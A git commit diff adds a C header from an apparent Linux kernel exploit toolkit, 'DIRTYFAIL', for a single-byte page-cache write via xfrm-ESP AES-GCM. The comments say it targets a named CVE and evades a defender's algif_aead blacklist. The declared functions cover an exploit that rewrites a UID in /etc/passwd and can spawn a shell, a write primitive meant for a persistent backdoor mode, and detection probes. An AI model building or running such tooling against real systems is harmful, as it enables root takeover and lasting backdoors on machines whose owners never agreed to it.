Initial skeleton: README, CVE inventory, roadmap, ARCH, ethics + copy_fail_family module absorbed from DIRTYFAIL
This commit is contained in:
@@ -0,0 +1,61 @@
|
||||
/*
|
||||
* DIRTYFAIL — copyfail_gcm.h
|
||||
*
|
||||
* Single-byte page-cache write via xfrm-ESP `rfc4106(gcm(aes))` AEAD.
|
||||
*
|
||||
* This module is a sibling primitive to copyfail.c (4-byte authencesn
|
||||
* STORE) and dirtyfrag_esp.c (4-byte authencesn STORE via XFRM). It
|
||||
* targets the SAME bug class (CVE-2026-43284 xfrm-ESP no-COW path),
|
||||
* but uses `rfc4106(gcm(aes))` instead of `authencesn(...)` as the
|
||||
* AEAD. That changes the primitive in two useful ways:
|
||||
*
|
||||
* 1. Coverage. A defender who blacklisted only `algif_aead` to stop
|
||||
* Copy Fail (CVE-2026-31431) is still vulnerable here — neither
|
||||
* algif_aead nor the authencesn template is on the path.
|
||||
*
|
||||
* 2. Granularity. AES-GCM is a counter-mode cipher; in-place
|
||||
* "decryption" is just XORing the keystream onto the spliced
|
||||
* page byte. We can land an arbitrary single byte at any file
|
||||
* offset (no 4-byte alignment, no 4-byte side-effects) by
|
||||
* brute-forcing the IV until keystream[0] equals
|
||||
* `target_byte XOR desired_byte`.
|
||||
*
|
||||
* The 1-byte primitive is what makes the persistent backdoor mode
|
||||
* (`backdoor.c`) feasible without alignment juggling.
|
||||
*
|
||||
* Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
|
||||
* (`copyfail2.c`), reimplemented here in DIRTYFAIL style.
|
||||
*/
|
||||
|
||||
#ifndef DIRTYFAIL_COPYFAIL_GCM_H
|
||||
#define DIRTYFAIL_COPYFAIL_GCM_H
|
||||
|
||||
#include "common.h"
|
||||
|
||||
/* Detection: kernel + esp4 + rfc4106(gcm(aes)) availability + userns. */
|
||||
df_result_t copyfail_gcm_detect(void);
|
||||
|
||||
/* End-to-end PoC: flip /etc/passwd UID via rfc4106(gcm(aes)) STORE.
|
||||
* Equivalent functional outcome to copyfail_exploit() and
|
||||
* dirtyfrag_esp_exploit() — different kernel path. */
|
||||
df_result_t copyfail_gcm_exploit(bool do_shell);
|
||||
df_result_t copyfail_gcm_exploit_inner(void);
|
||||
|
||||
/* Low-level building block exposed for backdoor.c:
|
||||
* write a single byte at `target_path` offset `target_off`. The caller
|
||||
* MUST already be inside a fresh user namespace with CAP_NET_ADMIN
|
||||
* (ESP SA registration prerequisite). Returns true on apparent
|
||||
* success — caller verifies via re-read. */
|
||||
bool cfg_1byte_write(const char *target_path,
|
||||
off_t target_off,
|
||||
unsigned char desired_byte);
|
||||
|
||||
/* Active probe: installs a GCM SA with arbitrary IV, fires ONE
|
||||
* gcm_trigger against a /tmp sentinel. Skips IV brute force entirely;
|
||||
* the kernel STORE writes an unpredictable byte (keystream XOR 'A')
|
||||
* which still confirms the path is reachable. Returns DF_VULNERABLE
|
||||
* on byte change, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */
|
||||
df_result_t copyfail_gcm_active_probe(void);
|
||||
df_result_t copyfail_gcm_active_probe_inner(void);
|
||||
|
||||
#endif
|
||||
Reference in New Issue
Block a user